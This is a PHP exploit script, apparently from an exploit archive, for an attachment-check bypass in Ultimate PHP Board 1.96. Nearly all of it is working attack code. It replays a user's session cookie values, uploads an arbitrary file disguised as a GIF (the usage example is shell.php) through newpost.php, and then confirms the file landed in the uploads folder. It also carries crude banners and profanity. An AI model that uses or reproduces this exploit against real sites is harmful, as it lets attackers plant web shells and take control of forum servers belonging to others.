Language: PHP
Author: Matrix86
Description: UPB 1.96 Remote Upload File
Date: 22/09/08 10:48
  1. <?php
  2. ini_set("max_execution_time",0);
  3. ini_set("default_socket_timeout",4);
  4. /*
  5.  *  AUTHOR :    Matrix86
  6.  *  Contact:    matrix86 [AT ] tuxmealux [ DOT] net
  7.  *  CMS:                UPB (Ultimate Php Board)
  8.  *  Bug:                Forum Post attachment check bypass
  9.  *  
  10.  *  W la pizza! E la figa!!
  11.  *
 * Note:
 *              This exploit requires a valid forum account on the target. It
 *              needs the account's numeric user id, the password value exactly
 *              as it appears in the UPB session cookie (the author describes it
 *              as the encrypted password; the script only replays it), the
 *              username and the "power" (privilege) level. Log in with a
 *              browser and copy these four cookie values:
 *              pass_env
 *              user_env
 *              id_env
 *              power_env
  19.  */
  20.  
  21. function banner(){
  22.         echo "\n*****************************************************\n";
  23.         echo "*    UPB (Ultimate Php Board)     vers. 1.96            *\n";
  24.         echo "*    Forum Post attachment check bypass             *\n";
  25.         echo "*****************************************************\n";
  26.         echo "* Author: Matrix86                                  *\n";
  27.         echo "* Site:   http://www.tuxmealux.net                  *\n";
  28.         echo "*                                                   *\n";
  29.         echo "* W the pizza! And the italian girls!!              *\n";
  30.         echo "*****************************************************\n\n";
  31. }
  32.  
  33. function makePkt(){
  34.         global $host, $port, $path, $file, $userid, $pwd, $username, $power;
  35.        
  36.         $CRLF = "\r\n";
  37.         $boundary = "-------------------------------".time().time();
  38.         $body = "--".$boundary."\r\n";
  39.         $body .= "Content-Disposition: form-data; name=\"u_name\"\r\n";
  40.         $body .= "\r\n";
  41.         $body .= $username."\r\n";
  42.         $body .= "--".$boundary."\r\n";
  43.         $body .= "Content-Disposition: form-data; name=\"subject\"\r\n";
  44.         $body .= "\r\n";
  45.         $body .= "Sorry...Matrix86 has you!\r\n";
  46.         $body .= "--".$boundary."\r\n";
  47.         $body .= "Content-Disposition: form-data; name=\"icon\"\r\n";
  48.         $body .= "\r\n";
  49.         $body .= "icon11.gif\r\n";
  50.         $body .= "--".$boundary."\r\n";
  51.         $body .= "Content-Disposition: form-data; name=\"message\"\r\n";
  52.         $body .= "\r\n";
  53.         $body .= "Sorry...Matrix86 has you!\r\n";
  54.         $body .= "--".$boundary."\r\n";
  55.         $body .= "Content-Disposition: form-data; name=\"file\"; filename=\"".$file."\"\r\n";
  56.         $body .= "Content-Type: image/gif\r\n";
  57.         $body .= "\r\n";
  58.         $body .= file_get_contents($file)."\r\n";
  59. //      $body .= "--".$boundary."\r\n";
  60. //      $body .= "Content-Disposition: form-data; name=\"submit\"\r\n";
  61. //      $body .= "\r\n\r\n";
  62.         $body .= "--".$boundary."--\r\n";
  63.        
  64.         $packet  = "POST ".$path."newpost.php?id=1&a=1&t=1&t_id=&page=1&power_env=".$power."&user_env=".$username."&id_env=".$userid."&pass_env=".$pwd." HTTP/1.0\r\n";
  65.         $packet .= "Host: ".$host."\r\n";
  66.         $packet .= "User-Agent: Fuck Browser 2.1\r\n";
  67.         $packet .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
  68.         $packet .= "Content-Length: ".strlen($body)."\r\n";
  69.         $packet .= "Connection: Close\r\n";
  70.         $packet .= "Cookie: pass_env=".$pwd."; user_env=".$username."; id_env=".$userid."; power_env=".$power.";\r\n";
  71.         $packet .= "\r\n";
  72.         $packet .= $body;
  73.        
  74.         //echo $packet;
  75.        
  76.         return $packet;
  77. }
  78.  
  79. function sendPkt($packet) {
  80.         global $host, $port, $path, $file, $userid, $pwd, $username, $power;
  81.        
  82.         $ip = gethostbyname( $host );
  83.         if( stristr( $host, $ip ) ) return FALSE;
  84.        
  85.         echo "[*] Ip host: ".$ip."\n";
  86.        
  87.         if( !( $sock = fsockopen( $ip, $port ) ) ) return FALSE;
  88.         echo "[*] Connection done\n";
  89.         echo "[*] Sending data\n";
  90.        
  91.         fputs( $sock, $packet );
  92.        
  93.         echo "[*] Waiting for a response\n";
  94.        
  95.         $response = "";
  96.         while ( !feof( $sock ) ) {
  97.                 $response .= fgets ( $sock, 128 );
  98.         }
  99.         fclose( $sock );
  100.        
  101.         return $response;
  102. }
  103.  
  104.  
  105. banner();
  106.  
  107. if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [id_env] [user_env] [pass_env] [power_env] [uploadfile]\n\tExample: ".$argv[0]." http://127.0.0.1 /upb/ 34 fuckyou wfwf323 1 shell.php\n");
  108.  
  109.  
  110. $host     = $argv[1];
  111. $path     = $argv[2];
  112. $userid   = $argv[3];
  113. $username = $argv[4];
  114. $pwd      = $argv[5];
  115. $power    = $argv[6];
  116. $file     = $argv[7];
  117. $port     = 80;
  118.  
  119.  
  120. if( strstr( $host, "http://" ) ) $host = substr( $host, 7 );
  121.  
  122. $pkt = makePkt();
  123. $ris = sendPkt( $pkt );
  124. echo $ris;
  125.  
  126.  
  127. if( $ris != FALSE ) {
  128.         echo "[*] Response received!\n";
  129.        
  130.         $uploaded_file = "http://".$host.$path."uploads/".$file;
  131.        
  132.         $ris =file_get_contents($uploaded_file);
  133.         $ris1 = substr( $ris, 0, 15);
  134.         if( ($ris != FALSE) && (!stristr( $ris1, "404" )) ) echo "\n[@] Exploit succeed! Look at ".$uploaded_file."\n";
  135.         else echo "\n[X] Sorry...Exploit Failed!\n";
  136. }
  137. else echo "\n[X] Sorry...Exploit Failed! Sending error!\n";
  138. die();
  139.  
  140. ?>